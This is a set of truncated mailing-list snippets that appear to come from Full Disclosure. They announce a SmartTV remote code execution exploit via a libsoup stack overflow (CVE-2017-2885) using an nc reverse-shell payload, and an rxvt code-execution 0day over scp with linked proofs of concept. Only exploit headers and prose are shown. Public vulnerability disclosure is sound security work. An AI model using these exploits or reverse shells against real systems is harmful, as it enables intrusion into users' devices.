[FD] ProCaster LE-32F430 SmartTV RCE via libsoup/2.51.3 stack overflow (CVE-2017-2885)

#!/bin/sh # ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through # GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885) # ~ def 2020-02-15 . 850day exploit lol # Exploit payload: ret2libc system() nc reverse shell with a clean exit() CMD

[FD] (u)rxvt terminal (+bash) remoteish code execution 0day

#!/usr/bin/env python # Title: rxvt (remote) code execution over scp with $SHELL=/bin/bash (0day) # Version: rxvt 2.7.10, rxvt-unicode 9.22 # Author: def # Date: 2021-05-16 # CVE: N/A # #-- # (U)RXVT VULNERABILITY # # In

Re: [FD] (u)rxvt terminal (+bash) remoteish code execution 0day

es `scp` include popular CLI tools like `unrar` and `busybox tar` as demonstrated in the PoCs here: https://huumeet.info/~def/rxvt0day/ Note that GNU tar is not exploitable due to properly escaped filenames. - def ___ Sent through the Full D